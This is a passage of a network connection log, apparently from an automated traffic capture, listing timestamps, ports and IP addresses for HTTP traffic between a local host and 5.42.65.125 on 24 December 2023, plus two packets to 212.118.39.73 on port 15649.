Dec 24, 2023 10:44:34.068830967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.068900108 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.068944931 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.069850922 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.069981098 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.070017099 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.070030928 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.070064068 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.070611954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.070624113 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.070667028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.070684910 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.071397066 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.071425915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.071501970 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.071558952 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.071641922 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.072316885 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.072364092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.072416067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.072460890 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.073184967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.073273897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.073331118 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.073338985 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.073373079 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.074064970 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.074131966 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.074178934 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.074645042 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.074769020 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.074780941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.074810028 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.075560093 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.075638056 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.075674057 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.075679064 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.075710058 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.076462984 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.076575994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.076633930 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.076675892 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.077296972 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.077338934 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.077373028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.077415943 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.078197002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.078210115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.078248024 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.078277111 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.078309059 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.079037905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.079090118 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.079130888 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.079159975 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.079910994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.079958916 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.079976082 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.080004930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.080044985 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.080756903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.080851078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.080897093 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.080985069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.081573963 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.081614971 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.081646919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.081840038 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.081880093 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.082532883 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.082561016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.082602978 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.082638025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.082675934 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.083331108 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.083384991 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.083425045 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.083483934 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.084235907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.084279060 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.084364891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.084475040 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.084566116 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.084974051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.085144997 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.085211039 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.085249901 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.085903883 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.086070061 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.086116076 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.086159945 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.086684942 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.086698055 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.086757898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.086802959 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.086839914 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.087452888 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.087527990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.087564945 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.087567091 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.088273048 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.088314056 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.088375092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.088412046 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.088841915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.088855028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.088888884 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.088931084 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.089633942 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.089680910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.089684010 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.089737892 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.090384960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.090429068 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.090436935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.090485096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.090523005 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.091352940 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.091366053 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.091392994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.091408014 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.091423988 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.092289925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.092369080 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.092381001 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.092415094 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.092914104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.092959881 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.092999935 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.093015909 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.093714952 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.093760014 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.093760014 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.093796968 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.093818903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.094474077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.094513893 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.094552040 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.094579935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.095262051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.095371008 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.095400095 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.095452070 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.095515013 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.096024036 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.096065998 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.096148968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.096260071 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.096314907 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.096822977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.096913099 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.096982956 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.097043991 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.097620964 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.097707987 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.097748041 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.097769022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.098442078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.098484039 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.098598003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.098644018 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.098684072 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.099121094 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.099159002 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.099256992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.099350929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.099390984 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.100054026 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.100114107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.100158930 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.100233078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.100842953 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.100858927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.100898027 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.100933075 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.101468086 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.101510048 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.101516008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.101903915 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.102003098 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.102117062 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.102159023 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.102212906 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.102777004 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.102844000 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.102886915 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.102902889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.103518009 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.103569984 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.103598118 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.103883982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.103926897 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.104315042 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.104357004 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.104363918 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.104413033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.104562998 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.105062008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.105088949 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.105129957 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.105192900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.105802059 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.105907917 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.105921030 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.105964899 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.106575966 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.106587887 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.106621981 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.106674910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.107368946 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.107450008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.107496977 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.107559919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.108067036 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.108105898 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.108170033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.108208895 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.108241081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.108886003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.108931065 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.108968973 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.109013081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.109817982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.109846115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.109865904 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.109890938 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.109921932 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.110464096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.110521078 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.110555887 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.110637903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.110677004 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.111306906 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.111481905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.111809969 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.111856937 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.111924887 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.112052917 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.112065077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.112091064 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.112116098 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.112632990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.112667084 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.112704992 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.112716913 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.113368034 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.113414049 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.113502026 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.113605976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.113712072 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.114161015 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.114327908 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.114367962 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.114499092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.114671946 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.114711046 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.114969015 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.115012884 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.115058899 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.115539074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.115705967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.115717888 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.115757942 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.115780115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.116058111 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.116657019 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.116755009 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.116795063 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.116844893 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.116931915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.116972923 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.117516994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.117573977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.117614985 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.117650032 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.117666960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.117702007 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.118486881 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.118537903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.118556976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.118583918 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.118632078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.118673086 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.119364977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.119435072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.119479895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.119520903 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.119527102 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.119714975 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.120326996 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.120431900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.120445013 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.120471001 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.120497942 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.120537996 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.121598959 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.121611118 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.121680975 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.121701956 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.121747017 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.121865988 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.122313976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.122370005 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.122419119 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.122467041 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.122481108 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.122526884 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.123146057 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.123225927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.123253107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.123265028 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.123300076 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.123378992 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.124139071 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.124198914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.124217987 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.124259949 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.124315023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.124353886 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.124593973 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:34.124764919 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:34.125055075 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.125119925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.125185013 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.125216961 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.125252008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.125292063 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.126099110 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.126121998 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.126169920 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.126504898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.126532078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.126573086 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.126604080 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.126668930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.126710892 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.127409935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.127512932 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.127526045 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.127554893 CET	49724	80	192.168.2.5	5.42.65.125
